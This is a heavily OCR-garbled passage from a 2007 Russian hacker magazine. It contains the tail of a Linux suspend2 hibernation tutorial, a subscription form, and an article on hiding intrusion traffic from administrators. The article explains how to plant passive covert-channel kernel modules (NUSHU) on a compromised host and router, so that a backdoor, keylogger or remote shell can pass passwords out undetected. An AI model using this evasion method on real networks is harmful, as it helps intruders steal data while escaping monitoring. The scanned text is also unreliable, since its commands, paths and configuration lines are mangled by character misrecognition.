30-графике. 

Параметрами в ІпсотраІІЫеРгодгатзты можешьуказать программы, 
которые по каким-либо причинам несовместимы с 5изрепсІ2. В этом 
случае, если 5изрепсІ2 обнаружит, что такая программа выполняется, он 
отмен ит заморозку. 

Также можно залочить систему после пробуждения одним из параметров 
в опциях ЕоскСопзоІеАз, ЕоскХЗсгеепЗаѵег, ІоскѲпотеЗсгеепЗаѵег, 
1_оскК0Е, І_оскХІ_оск и І_оскХАи1юІ_оск (здесь нужно определить лишь 
один из вышеперечисленных параметров). Еслиты это сделаешь, то 
после пробуждения, чтобы продолжать работу, необходимо будет вновь 
залогиниться. 

Наконец, если в оп ци и ХЗіаІиз ты укажешь одно из значений (кбе, дпоте 
или х), то 5изрепсІ2 будет выводить прогресс-бар при засыпании/пробуж- 
дении, а также выдавать сообщения об ошибках в окошках для указанной 
графической среды. 

Итак, мы закончили настройку 5изрепсІ2, и можно переходить к 
настройке загрузчика. Но если ты решил использовать в каче- 
стве буфера для сохранения РАМ не раздел подкачки, а файл, 
то его сперва необходимо подготовить. Делается это так. В 
/еІс/ЫЬегпаІе/зизрепсІЗ.сопІ ищем строку «ЕІІеѵѵгіІегЕосаІіоп», 
раскомментируем ее и переделываем по своему вкусу, например: 
«ЕІІеѵѵгіІегЕосаІіоп /ѵаг/зизрепсМіІе 1024». Здесь первый пара- 
метр — это имя файла под буфер, второй — его размер в мегабай- 
тах. Далее командуем: 

# МЬегпаке --по-зизрепБ 

И 5изрепсІ2 сам подготовит для нас файл. Смотрим, что выдает/зуз/ 
ро\л/ег/зизрепс12/ге5ите2: 

# сак /зуз/рсжег/зизрепс!2 /гезите2 

Это может быть что -то тип а «ІіІе:/сІеѵ/НсІа1 :0х 1 001 II». Записываем эту 
строчку — она нам позже понадобится при конфигурировании загрузчика. 
Для использования файла подкачки в качестве буфера в файле/еіс/ 
ЫЬегпаІе/зизрепсІ2.сопІ находим и заполняем следующий пункт: 




Не верится, что каких-нибудь 20 секунд назад компьютер был выключен 

ЗизрепсІБеѵісе зѵѵар : /сІеѵ/МаЗ /зѵ\гар_кі1е 
Запускаем: 

# МЪегпаке --по-зизрепсі 
Смотрим: 

# сак /зуз/ромег/зизрепс12 /зѵ\гар/Ь.еас1ег1осакіопз 

Мы можем получить что-тотипа «зѵѵар:/беѵ/ИбаЗ:0хІб400». Тогда /еіс/ 
ЫЬегпаІе/зизрепб2.сопІ будет выглядеть следующим образом: 

ЗизрепсІБеѵісе зѵѵар : /сІеѵ/МаЗ : ОхксМОО 

5изрепсІ2 запоминаетабсолютное расположение файлов на жестком 
диске, поэтому в случае изменения местоположения файла подкач- 
ки (или еслиты его удалил, а потом восстановил) необходимо вновь 
свериться с/зуз/роѵѵег/зизрепбЗ/зѵѵар/ЬеабегІосаІіопз, чтобы узнать 
его новые координаты, и внести соответствующие изменения в конфиг и 
загрузчик. 

НАСТРОЙКА ЗАГРУЗЧИКА 

Итак, мы откомпилировали ядро и поместили его в/ЬооІ, например, так:«ср 
агсЬ/і386/Ьооі/Ь2Ітаде/Ьооі/кегпе[-2.6.19.2зи5репб2» (имя — потвоему 
желанию). Теперьуказываем его в загрузчике в опции кегпеі и добавляем 
туда строчку «гезите2=указание на наш буфер (своп или файл)». Еслиты 
используешь своп, это может вы гл я деть так: «гезите2=зѵѵар:/беѵ/ЬбЬ4». 
Еслижеты решил задействовать файл, сюда надо подставитьзначение 
из/зуз/роѵѵег/5и5репб2/ге5иппе2 с префиксом «ІіІе»:«гезите2=ІіІе:/сІеѵ/ 
Нбаі :0х1 00 1 1I». Если своп-файл, то «гезите2=5\л/ар:/беѵ/ИбаЗ:0хІб400» 
(берем значение из/зуз/роѵѵег/зизрепбЗ/зѵѵар/ЬеабегІосаІіопз). 

Вся секция (если своп у нас на /беѵ/ЬбЬ4) может выглядеть так (при 
использовании дгиЬ): 

кікіе Шаке БР! (Кегпеі 2.6.19.2 ѵѵікЪ. Зизрепс12) 
гоок (М0,0) 

кегпеі /Ьоок/кегпе1-2 .6.19 . 2зизрепс12 гоок = /с!еѵ/]тс1Ы 
іпік = /зЫп/іпік \ 

диіек гезшпе2 = змар : /сіеѵ/]тсіЬ4 

В И Іо это же будет выглядеть следующим образом: 

ігпаде = /Ьоок/кегпе1-2 . 6 . 19 . 2зизрепс12 

ІаЪеІ = Шке БР ! (Кегпеі 2.6.19.2 ѵ^ікіт ЗизрепБ2 ) 

аррепсі = " гезшпе2 = змар : /сіеѵ/]тсіЬ4 " 
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ШНДНЦ 



Обрати внимание на строчку «5изрепб2 2.2.9: Пезитіпд епаЫесІ». Она пока- 
зывает, что наш пингвин готов кзаморозке/разморозке! Для апробирования 
этой фичи рекомендуется сначала усыпить систему без Х’ов. Переходим на 
текстовую виртуальную консоль (<АІі-СМ-Р1>) и закрываем Х’ы, например, так: 

# /еДс/іпіО . сі/хсіт зкор 

Или і п И; 3, еслиу нас Реб На!, Ребога Соге или Мапбгіѵа, потом командуем: 

# ЛіЪегпаке 

Если засыпание не состоялось (например, 5изрепб2 не смог выгрузить 
модуль, а он сообщит об этом на экране или в/ѵаг/Іод/ЫЬегпаіе.Іод), мож- 
но форсировать процесс: 

# ЛіЪегпаке --іогсе 



Также рекомендуется иметь «запасную» секцию на случай, если ты не 
захочешь пробуждать пингвина (после засыпания) или подумаешь, что 
файловая система, используемая при работе заснувшим ядром, была 
каким-то образом изменена: 

кікіе Воок мікіюик гезише (Кегпеі 2.6.19.2 мікЬ. 
8изрепс12 ) 
гоок (іісіО , 0) 

кегпеі /Ьоок/кегпеІ-2 .6.19 . 2зизрепс12 гоок = /с1еѵ/]тс1Ы 
іпік=/зЪіп/іпік \ 

диіек гезите2=змар : /с!еѵ/]тсіЪ4 погезише2 
Для И Іо : 



Тогда 5изрепб2 выполнить свою работу при любых обстоятельствах. 

Если же 5изрепб2 повис, смотрим егологи. Это может произойти, на- 
пример, из-за несовместимого модуля, который мы забыли выгрузить. В 
таком случае перезагружаемся, включаем его название в выгружаемые 
модули (в файле конфигурации ЫЬегпаіе) и повторяем попытку. 
Теперьснова включаем компьютер, выбираем в загрузчике пункт ѴѴаке 
ІІР! (Кегпе12.6.19.2ѵѵііЬ 5изрепб2) — и через небольшой промежуток вре- 
мени (если все пошло по плану, конечно) мы оказываемся втой консоли, 
откуда ушли, с сохранением всего рабочего окружения. 

Стартуем Х’ы (/еіс/іпіі.б/хбт зіа гі или іпіі: 5), открываем консоль и пробуем 
заснуть так: 

# ЛіЪегпаке 



ішаде = /Ъоок/кегпе1-2 . 6 . 19 . 2зизрепс12 

ІаЪеІ = Воок міккоик гезише (Кегпеі 2.6.19.2 члшкЪ. 

8изрепсі2 ) 

аррепсі = " гезише2 = змар : /<іеѵ/кс1Ъ4 погезише2 " 



Незабудь: каждый раз после изменения Іііо.сопі" нужно выполнять коман- 
ду/зЬіп/ІіІо. 

Теперь ты всегда сможешь загрузить систему без пробуждения, выбрав 
строчку «ВооіѵѵііЬоиі гезите». 

Итак, у нас все готово. Теперь нужно убедиться, что мы все сделали верно 
и можем использовать5изрепб2. Для этого необходимо просто перезагру- 
зиться с новым ядрышком (если ты сделал два пункта: без погезите2 и с 
ним, можно выбрать любой из них — 5изрепб2 сам распознает готовность 
системы к пробуждению) и просмотретьлогядра: 



$ 0МЕ56 I ѲРЕР51І5РЕМ02 



8изрепс12 

8изрепс12 

8изрепс12 

8изрепс12 

8изрепс12 

8изрепсі2 

8изрепсі2 

8изрепсі2 

8изрепс12 

8изрепс12 

8изрепсі2 

8изрепсі2 



Соге . 

ІІзегзрасе ІЛ Зиррогк шосіиіе Іоасіесі. 
СЬескзишшіпд шосбиіе іоасіесі. 

ІІзегзрасе Зкогаде Мападег шосіиіе Іоасіесі. 
Сошргеззог шосіиіе Іоасіесі. 

Епсгурког шосіиіе Іоасіесі. 

Віоск І/О шосіиіе Іоасіесі. 

Змар АІІосаког шосіиіе Іоасіесі. 

2.2.9: ЗмарАІІосаког : Зідпакиге Тоипсі. 
2.2.9: Кезишіпд епаЫесі . 

2.2.9: Ыогшаі зі^арзрасе Тоипсі. 

2.2.9: N 0 ішаде іоипсі. 



Потрясен? Да, 5изрепб2 работает очень быстро. Например, у меня систе- 
ма на Сеіегоп 2 ГГцс 512 метрами РАМ и обычным ЮЕ-диском с разделом 
подкачки на 512 Мб, графический адаптер Ыѵібіа МХ440 с последней 
версией Іедасу-драйвера от Ыѵісііа, и на засыпание в графической среде 
КйЕ я трачу около 30 секунд, а на просыпание — 22 секунды! С восстанов- 
лением, естественно, полного рабочего окружения КОЕ, открытых окон с 
загруженными документами и тому подобного. 

Если же 5изрепб2 по каким-то причинам не заработал, внимательно 
изучи надписи на экране, которые он выдает, а также лог. Ктвоим услугам 
поддержка на официальном сайте ( уѵѵѵѵѵ.5Ц5репб2.пеі/ЕА0 ). информация 
вѴѴІкі ( уѵікі.5цзрепб2.пеі ). а также мейлинг-лист ( ѵѵѵѵѵѵ.5и5репсІ2.пеі/[І5Ы 
и ІРС-канал #зизрепб2 на ігс.ітеепосіе.пеі: . где тебе могут помочь. 

ЗАКЛЮЧЕНИЕ 

Сейчас существуеттри основных реализации спячки под Линукс — это 
рассмотренный нами 5изрепб2, зѵѵзизр и изѵѵзизр. Причем зѵѵзизр (при 
поддержке Павла Мачека, стоявшего у истоков создания механизма 
спячки в Еіпих) входит, какты могзаметить, в ванильные ядра, начиная 
с ветки 2.6. Но он не получил должного признания, поскольку кроме 
основных недостатков (которые напрямую пересекаются с недочетами 
5изрепсІ2) имеетеще ряд недоработок, в частности невозможность 
сохранения полного объема памяти в разделе подкачки. Ему на смену 
(начиная с версии ядер 2.6.1 7) пришел так называемый изегіапб зѵѵзизр 
(изѵѵзизр), поддерживаемый Ли нусом Торвальдсом. Эта модификация 
зѵѵзизр использует особое символьноеустройство, через обращение к 
которому с помощью специальныхутилит и осуществляется весь процесс 
спячки. Насколько это оправдано, покажеттолько время и практика. 
Спокойнойтебе спячкиі^с 
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Теперь ты можешь получать 
журнал с КУРЬЕРОМ 

не только в Москве, но и в Санкт-Петербурге, 
Уфе, Нижнем Новгороде, Волгограде, Казани, 
Перми, Челябинске, Омске. 



ПО ВСЕМ ВОПРОСАМ р связанным с подпиской, звоните по 
бесплатным телефонам 8(495)780-88-29 (для москвичей) и 8(800)200-3-999 (для 
жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). 
Вопросы о подписке можно также направлять по адресу іпІЬѲдІс.ги или прояс- 
нить на сайте ѵѵѵѵѵѵ.ОБС.ги 



КАК ОФОРМИТЬ ЗАКАЗ 

1 . Разборчиво заполните подписной купон и квитанцию, вырезав 

• их из журнала, сделав ксерокопию или распечатав с сайта 
ѵѵѵѵѵѵ.діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 

• квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 1 19992, Москва, 

ул. Тимура Фрунзе, д. 1 1 , стр. 44-45, ООО «Г ейм Лэнд», отдел подписки. 



ВНИМАНИЕ! 

Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в редакцию по факсу 
или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по почтовому адресу 
редакции. 

Рекомендуем использовать факс или электронную почту, в последнем случае предвари- 
тельно отсканировав или сфотографировав документы. 

Подписка оформляется с номера, выходящего через один календарный месяц после опла- 
ты. Например, если вы производите оплату в ноябре, то журнал будете получать с января. 



СТОИМОСТЬ ЗАКАЗА НА КОМПЛЕКТ ХАКЕР+0ѴР 



1 080 руб за 6 месяцев 1 980 руб за 1 2 месяцев 



5292 руб за комплект Хакер РѴР + ІТ Спец СР + Железо РѴР 



1 номер 
всего за 
147 рублей 



| на журнал Хакер БѴР 




1 1 комплект Хакер ЭѴЭ + ІТ Спец СЭ + 

І — 1 Железо ЭѴЭ 


| | на 6 месяцев 

^|на 12 месяцев 




начиная с 


2007 г. 


1 — 1 Доставлять журнал по почте 
1 — 1 на домашний адрес 




Доставлять журнал курьером: 




1 1 на адрес офиса * 

] на домашний адрес** 





Извещение 



(Отметьте в квадрате выбранный вариант подписки) 

Ф.И.О. 

Дата рожд. пп. пп. пп г 

день месяц год 

АДРЕС ДОСТАВКИ 

Индекс 

Область/ край 

Город 

Улица 



Дом 



Корпус 



Квартира/офис 



Телефон ( 



Е-таіІ 



Сумма оплаты 



*в свободном поле укажи название фирмы и 
другую необходимую информацию 

**в свободном поле укажи другую необходимую 
информацию и альтернативный вариант доставки 
в случае отсутствия дома 



свободное поле 



Кассир 



Квитанция 



Кассир 



ИНН 7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 



КПП 770401001 



Плательщик 



Адрес (с индексом) 



Назначение платежа 




Сумма 


Оплата журнала « 


» 




с 


2007 г. 





Ф.И.О. 



Подпись плательщика 



ИНН 7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 



КПП 770401001 



Плательщик 



Адрес (с индексом) 



Назначение платежа 




Сумма 


Оплата журнала « 


» 




с 


2007 г. 





Ф.И.О. 



Подпись плательщика 
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ДО СИХ ПОР РАССМАТРИВАЕМЫЕ НАМИ 
СПОСОБЫ МАСКИРОВКИ ТРАФИКА 
СВОДИЛИСЬ К СОКРЫТИЮ СЕТЕВЫХ 



КРИС КАСПЕРСКИ 



Прячем 

трафик 

от 

админов 

Техника сокрытия ІР-трафика с помо- 
щью секретных пассивных каналов 



СОЕДИНЕНИЙ, НО НА ФИЗИЧЕСКОМ 
УРОВНЕ ВЕСЬ ЛЕВЫЙ ТРАФИК ЭЛЕМЕН- 
ТАРНО ОБНАРУЖИВАЛСЯ СНИФЕРАМИ 
И ПРОЧИМИ ЗАЩИТНЫМИ СРЕДСТ- 
ВАМИ. ВОТХАКЕРЫ НАПРЯГШИСЬ И 
РЕШИЛИ ЭТУ ПРОБЛЕМУ ПУТЕМ СОЗ- 
ДАНИЯ СЕКРЕТНЫХ ПАССИВНЫХ КАНА- 
ЛОВ, ПЕРЕДАЮЩИХ ИНФОРМАЦИЮ БЕЗ 
ГЕНЕРАЦИИ КАКОГО-ЛИБО ТРАФИКА 
ВООБЩЕ. ИСХОДНЫЕ ТЕКСТЫ ДВИЖ- 
КОВ ВЫЛОЖЕНЫ В СЕТЬ, И ВСЕ, ЧТО 
НАМ НУЖНО, - ЭТО РАЗОБРАТЬСЯ, КАК 
ИХ ПРИКРУТИТЬ К НАШЕМУ КЕЙЛОГГЕ- 
РУ ИЛИ УДАЛЕННОМУ ШЕЛЛУ, ЧЕМ МЫ 
СЕЙЧАС И ЗАЙМЕМСЯ. 



аброситьвЬеІІ-код наудаленную машину и застолбитьтам 
Ьаск-сіоог — это только половина дела. А что делать дальше, 
мы подумали? Необходимо скрытьсвой ІР-адрес и обойти 
все брандмауэры, не оставляя никаких следов в логах, 
анализируемых как вручную, так и автоматизированными системами 
определения вторжения. 

Существует множество утилит, прячущих левые сетевые соединения от 
глаз администраторов, однако на физическом уровне весь«хакерский» 
трафик элементарно обнаруживается и пресекается практически любым 
брандмауэром, чего атакующему допускать ни в коем случае нельзя. 

В идеале необходимо пробить тоннель, открыв секретный канал связи, 
не создающий никаких дополнительных соединений и не генерирующий 
никакого избыточного трафика, чтобы даже самый строгий разбор дампов, 
награбленных сетевым анализатором, не выявил ничего подозрительного. 
Над решением этой проблемы билисьлучшиехакерскиеумы. Сначала идея 
получила чисто теоретическое обоснование (Апбгеѵѵ ИЫі, Сгаід Роѵѵіапсі) с 
чисто лабораторной реализацией, непригодной для практического исполь- 
зования. Затем кделу подключиласьЖанна Рутковская, разработавшая 
специальный протокол с кодовым названием КІІІ5НІІ и вполнежизне- 
способные модули, ориентированные на работу в Ыпих Кегпе12.4. Жанна 
вручила нам мощноесредстводляуправленияудаленными вЬеІГами, адек- 
ватную защиту от которого практически невозможно разработать. Осталось 
только разобраться, какэтим средством воспользоваться. 

СКРЫТЫЕ ПАССИВНЫЕ КАНАЛЫ: ОСНОВНЫЕ КОНЦЕПЦИИ 

С недавних пор в хакерском лексиконе появилось понятие «скрытых 
пассивных каналов» (Равзіѵе Соѵегі СЬаппеІв, или сокращенно РСС). Они 
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представляют собой разновидность обычных скрытых каналов (Соѵегі 
СЬаппеІз), однако, в отличие отпоследних, нетолько неустанавливают 
своих соединений, но и вообще не генерируют никакого собственного 
трафика! Передача информации осуществляется исключительно путем 
модификации пакетов, пролетающих мимо ата кованного узла. 

Соль втом, что эти пакеты не направляются кхакеру, а шуруютсвоими 
путями на различныеузлы интернета, например ѵѵѵѵѵѵ.доодіе. сот , за счет 
чего достигается высочайшая степеньанонимности. 

Естественно, возникает резонный вопрос: как хакер сможет добраться 
до содержимого пакетов, идущих мимо него? Для этого необходимо 
подломать один из промежуточных маршрутизаторов (как правило, 
принадлежащих провайдеру, обслуживающему атакуемую органи- 
зацию) и установить на него специальный модуль, анализирующий 
заголовки ТСР/ІР-пакетов на предмет наличия скрытой информации 
или ее внедрения. 

Таким образом, хакер организуетдвухсторонний секретный пассивный 
канал связи сузлом-жертвой, нетолько засекретив факт передачи левой 
информации, но еще и надежнозамаскировав свой ІР, который можетоп- 
ределить только администратор взломанного маршрутизатора, но никак 
не владелецузла-жертвы! 

Рассмотрим схему взаимодействия с целевым узлом (жертвой) по 
скрытому пассивному каналу. Хакер (обозначенный буквой X) каким-то 
не относящимся кобсуждаемой теме образом забрасывает на целевой 
узел (обозначенный буквой А) зИеІІ-код, захватывающий управление и 
устанавливающий Ьаск-сіоог вместе со специальным модулем, обеспе- 
чивающим функционирование РОС- канал а. Теперь всеТСР/ІР-пакеты, 
отправляемыежертвой во внешний мир, содержат незначительные 



изменения, кодирующие, например, пароли или другую конфиденциаль- 
ную информацию. 

Часть этих пакетов проходит через внешний маршрутизатор В, забла- 
говременно взломанный хакером, внедрившим в него РСС-модуль. 
РСС-модуль анализируетзаголовки всехТСР/ІР-пакетов на предмет 
скрытого содержимого, после чего декодирует его и отправляетхакеру 
по открытому каналу. Передача данных отхакера кжертве осуществ- 
ляется по аналогичной схеме. РСС-модуль, установленный на мар- 
шрутизаторе, выявляет пакеты, направленные на целевой ІР-адрес, и 
модифицируетихзаголовки в соответствии с выбранным принципом 
кодирования информации. 

Таким образом, мы получаем защищенный канал А-В и открытый В-Х, 
однако хакеру ничего не стоит общаться с узлом В через анонимный 
ргоху-сервер или даже выстроить цепочку из несколькихзащищенных 
хостов. К тому же выбор маршрутизатора В необязателен. Главное, чтобы 
маршрутизатор располагался между целевым узлом А и одним из узлов, с 
которыми общается жертва. 

ВО ВЛАСТИ ПРОТОКОЛА ІР 

Возьмем протокол ІР и попробуем создать на его основе скрытый пассив- 
ный канал. Среди множества полезных и бесполезных полей заголовка 
наше внимание привлекает 16 -битовое поле ИепШісабоп (смотри рисунок 
«Форматзаголовка ІР-пакета»), генерируемое операционной системой 
случайным образом и используемое для идентификации дейтаграммы 
в случае ее фрагментации. Узел-получатель группируетфрагменты с 
одинаковыми ІР-адресами источника/назначения, типом протокола и, 
разумеется, идентификатором. 
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Схема взаимодействия с целевым узл ом (жертвой) по скрытому пассив- Формат заголовка ІР-пакета 

ному каналу 



Строгих правил, определяющих политику генерации идентификатора, 
в РРС нет. Одни операционные системы используют для этого таймер, 
другие вычисляют идентификатор на основе ТСР-пакетов, чтобы при 
повторной передаче ТС Р-сегмента ІР-па кет использовал тот же самый 
идентификатор, однако даже если идентификатор окажется иным, ничего 
ужасного не произойдет. Ну подумаешь, чуть-чуть упадет скорость. 

Фишка втом, что РСС-модуль может беспрепятственно модифицировать 
поле идентификатора по своему вкусу, передавая с каждым ІР-пакетом 
1 6 бит полезных данных. Это втеории. На практике же нам потребуется 
выделить несколько бит для маркировки своих пакетов, иначе РСС-при- 
емникниза что не сможет отличить их от остальных. Пусть в 12 младших 
битах передаются полезные данные, а в четырех старших — их контроль- 
ная сумма. Тогда РСС-приемнику останется всего лишь взять 1 2 бит, 
рассчитать их СРС и сравнить с оставшимися четырьмя битами. Если они 
совпадут, то это наш пакет, если же нет — пускай идет себе лесом. 

Также следует позаботиться о нумерации пакетов, поскольку порядок сле- 
дования ІР-пакетов в общем случае не совпадаете порядком их отправки. 
А для этого также требуются биты, в результате чего реальная информаци- 



ФОРМАТ ТСР-ЗАГ0Л0ВКА 

0 4 8 16 


19 24 


32 


1 Зоигсе Рог! 1 


Оезііпаііоп Рог! 


1 


1 Зедиепсе ІМитЬег 1 


1 Аскпоѵѵіесідтѳпі ІМитЬег 1 


1 НІ_ЕІМ 1 НезегѵесІ 1 Сосіе Ві!з 1 


ѴѴіпсІоѵѵ 


1 


1 СЬескзит 1 


ІІгдеп! Роіп!ег 


1 


1 Орііопз 


1 Расісііпд 


1 


1 Оа!а 1 



онная емкость ІР-заголовка стремится к одному байту, что, в общем-то, не 
такужи плохо. Для передачи небольших объемов данных (типа паролей) 
вполне сойдет. Главное — не забывать отом, что идентификатор должен: 
а) быть уникальным; б) выглядеть случайным. Поэтому необходимо при- 
бегнуть кскремблированию, то есть к наложению на передаваемый текст 
некоторой псевдослучайной последовательности данных (известной как 
РСС-отправителю,таки РСС-получателю) через операторХОР. 



Кроме идентификатора, можно (с некоторой осторожностью) менять поля 
ТТІ_ (ТіппеТо І_іѵе — максимальное время жизни пакета), тип сервиса (Т05) 
и протокола (рго!осоІ). Однако это слишком заметно и легко обнаружива- 
ется просмотром дампов, полученных любым снифером. 

НАШ ИЗВОЗЧИК— ПРОТОКОЛ ТСР 

При установке ТСР-соединения передающая сторона (узел А) устанавли- 
вает флаг 5УІМ и выбирает произвольный 32-битный номер последова- 
тельности (Зедиепсе ІМитЬег, или сокращенно ЗЕО). Если принимающая 
сторона (узел В) согласна принять узел А в свои объятия, она отправляет 
ему пакетсустановленным флагом АСК и номером подтверждения 
(Аскпоѵѵіесідтеп! ЫитЬег), равным 5Е0+1 , атакже генерируетсвой соб- 
ственный номер последовательности, выбираемый случайными образом. 
Узел А, получив подтверждение, поступает ан а до-ги.чным образом, что 
наглядно демонстрирует следующая схема:' 

І5Ы — это начальный номер последовательности (Іпі1:ВаІ Зециепсе 
ЫитЬег), уникальный для каждого ТС Р/ІР-соединен.йя. С момента ус- 
та нрвк^еоеди^ния номера последовательности планомерно увеличи- 
ваются на количествб'гТрииятых/отправленны-х'байт. Впрочем, не будем 
углубляться в теорию. Остановимся на том факте, что 32-битное поле І5ІМ 
можно изменять псевдослучайным образом, «промодулированным» 
секретными данными и... никто ничего незаметит! Конечно, пропускная 
способностьупадетдо четырех байт на каждое ТСР-соединение, уста- 
навливаемое узлом-жертвой, а ТСР-соединений устанавливается нетак 
ужи много (особенно если мы имеемдело нес нагруженным сервером, а 
с рабочей станцией). Тем не менее для перекачки паролей и удаленного 
управления через командную строку даже такой скромной пропускной 
способности вполне достаточно. 

Жанна Рутковская, решив не ограничиватьсебя лабораторными опытами, 
разработала протокол КІІІЗНІІ, создающий скрытые пассивные каналы 
посредством модификации І5ІМ с последующим шифрованием последне- 
го алгоритмом йЕЗ на основе идентификатора ІР-пакета (ІР.ІсІ), порта-ис- 
точника (ТСР.зрог!) и ІР-адреса назначения (ІР.басІсІг). 

СЕАНС ПРАКТИЧЕСКОЙ МАГИИ 

Идем на сайтЖанны Рутковской — іпѵізіЫеіЫпдз.огд . видим раздел с инстру- 
ментами Фоіз, находим в нем «ІМІІ5НІІ — раззіѵе соѵег! сЬаппеІепдіпеІюг Ыпих 
2.4 кегпеіз» и качаем архив исходи ыхтекстов — іпѵізіЫеіЫпдз.огдЛооІз/пизЬи/п 
изЬиТаг.дг (всего 18 Кб). Распаковываем, компилируем. Компиляция осуществ- 
ляется стандартно. Просто за пускаем утилиту таке и получаем три модуля ядра: 
пизЬи_гесеіѵег.о (приемник), пизЬи_зепсІег.о (передатчик) и пизЬи_ЫсІег.о. 
Приемникустанавливается на поломанный маршрутизатор, передатчик 
— на целевой узел жертвы. Для организации двухсторонней связи при- 
емники передатчикустанавливаются на оба узла. Модуль пизЬи_Ысіег.о 
в организации скрытого канала неучаствует и предназначен для обмана 
штатных анализаторов (типа !србитр), не позволяя им обнаруживать 
факт изменения І5ІМ. 
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Механизм шифрования І5Ы в протоколе N115411 



Из геасіте следует, что модуль-передатчик обрабатывает следующие 
параметры командной строки: 

беѵ=<беѵісе>, где беѵісе — сетевое устройство, с которым предполагает- 
ся работать (например, еіЬО); 

сірЬег=[0|1], где 0 означает передачу без шифрования, а 1 предписывает 
использование 0Е5; 

кеу=”з1;гі пд ” , где вігіпд — произвольная строка-маркер, идентичная 
строке-маркеру, установленной на модуле-приемнике (используется 
только втом случае, если шифрование выключено, иначе игнорируется); 
5гс_ір=<ір_ѵѵЬеге_пи5Ьи_5епбег_І5_рІасеб> — ІР-адресузла, на котором 
установлен передатчик. 

Модуль- прием ни к, помимо описанных выше ключей беѵ, сірбег и кеу, 
обрабатываетаргументехсІибе_ір=<1 72.1 6.*.*>, задающий список не- 
прикосновенных ІР-адресов, при отправке пакетов на которые протокол 
N115411 задействован не будет, поскольку І5Ы останется неизменным 
(этот параметр является опциональным). 

Модуль пиБби_Ыбег.о загружается без каких-либо параметров и только в 
том случае, если в этом возникает необходимость. 

Хорошо, все модули успешно загружены, ядро функционирует нормально 
и в панику, судя по всему, впадать не собирается. Что делать дальше? 

А ничего! Ведь это только движок, обеспечивающий функционирование 
РСС-каналов. К нему можно прикрутить кейлоггер или удаленный вЬеІІ, но 
это уже придется делать самостоятельно. А как?! Ни геабте, ни сопрово- 
дительные презентации не дают ответа на этот вопрос, поэтому приходится 
зарываться в исходные тексты и разбирать их на отдельные байты. 

Начнем с передатчика, реализованного в файле вепбег.с. В процедуре 
іпіІ_тобиІе(), отвечающей за инициализацию модуля, сразу же броса- 
ются в глаза следующие строки: 



Полезные 

ссылки 

• ОЕѴСС — законченная реализация модуля РСС-каналов, использую- 
щая в качестве транспортного средства опции штампа времени вТСР- 
заголовках, спроектированная для работы с ядрами Ыпих’а версии 2.4.9 
или выше: ѵѵѵѵѵѵ.тИ.есіи/~ді^/соѵег1-сЬаппеІ/5гс . 

• Сгаід Н. Роѵѵіапб «Соѵегі СЬаппеІз іп іЬе ТСР/ІР Ргоіосоі Биііе» — ста- 
тья, посвященная вопросам проектирования, реализации и выявления 
скрытых пассивных каналов, с кучей демонстрационных примеров на 
Си: ѵѵѵѵѵѵ.Лг5*топбаѵ.бк/І55ие5/І55ие2 5/гоѵѵІапс] . 

• Апбгеѵѵ НіпІ 2 «Соѵегі СИаппеІз іп ТСР апб ІР Неасіегз» — основные 
тезисы презентации, рассматривающей доступные способы органи- 
зации РСС-каналов и методы их обнаружения, а также затрагиваю- 
щей вопросы пропускной способности и устойчивости РСС-каналов 
к различным ргоху-серверам, маршрутизаторам и брандмауэрам: 
диІі.пи/ргоіесІз/сс/соѵегІсЬап.ррІ. 

• боаппа Риікоѵѵзка «І_іпих Кегпеі Васксіоогз Апсі ТИеіг Оеіесііоп» — 
презентация Жанны Рутковской, рассказывающая о методах сокрытия 
и обнаружения гооікіі'ов, использующих РСС-каналы: іпѵізіЫеіЫпдз. 
огд/рарег5/ІТЦпс!егдгоипс12004 Ыпих кегпеі Ьасксіоогз.ррі . 

• боаппа Риікоѵѵзка «Раззіѵе Соѵегі СЬаппеІз Ітріетепіаііоп іп Ыпих 
Кегпеі» — еще одна шикарная презентация Жанны, буквально нашпи- 
гованная техническими подробностями по организации сетевого стека 
Ыпих’а и технике перехвата чужих пакетов с модификацией их заголовков: 
іпѵізіЫеіЫпдз.огд/рарегз/іоаппа-раззіѵе соѵегі сЬаппеІз-ССС04.ррІ . 

• боаппа Риікоѵѵзка «ТЬе Ітріетепіаііоп оі РаззіѵеСоѵегіСЬаппеІз іп Ыпих 
Кегпеі» — доклад, детально описывающий механизмы создания РСС-ка- 
налов : іпуізіЬМЫпдзюгсі/рарег^ 



сгеаЬе_ргос_геас1_епЬгу ( "теззаде_гесеіѵес1" , 0, ргос_ 
сіе, сс_геас!_ргос_теззаде , ШЬЬ) ; 

сгеаЬе_ргос_геас!_епЬгу ("іпбо", 0, ргос_<бе, сс_геас!_ 
ргос_іп^о, ШЬЬ); 

Как видно, вместо устройства тезБаде_1;о_5епб на этот раз создается 
те55аде_гесеіѵеб, из которого можно читать получаемые сообщения 
через стандартные функции ввода/вывода. В общем, имея на руках 
исходныетексты, со всеми этими причиндалами совсем несложно разо- 
браться, тем более что их суммарный объем составляет всего 69 Кб. 



зЬгисЬ ргос_сііг_епЬгу *ргос_с!е = ргос_ткс1іг ("гшзЪлі", 
ШЬЮ ; 

сгеаЬе_ргос_геасі_епЬгу (" іп^о», 0, ргос^е, сс_геасі_ 
ргос_іпбо, ШЬЬ) ; 

зкгисЬ ргос_сііг_епЬгу * мрсіе = сгеаке_ргос_епЬгу 
( "шеззаде_Цо_зепй" , 0, ргос_с!е) ; 

Все ясно! Модуль использует псевдофайловую систему/ргос, создавая 
директорию пизби, а в ней — два файла: іпбо и те55аде_1о_зепб, с кото- 
рыми можно работатьс прикладного уровня какс обычными устройства- 
ми (если быть точнее, псевдоустройствами). 

Аналогичным образом обстоят дела и с приемником, реализованным в 
файле гесеіѵег.с, ключевой фрагмент которого приведен ниже: 

зЬгисЬ ргос_сііг_епЬгу *ргос_с!е = ргос_шксііг ("пизЬи", 
ШШ) ; 



ЗАКЛЮЧЕНИЕ 

Помимо описанных существуют и другиетранспортные средства, при- 
годные для передачи скрытого трафика, например опция штампа вре- 
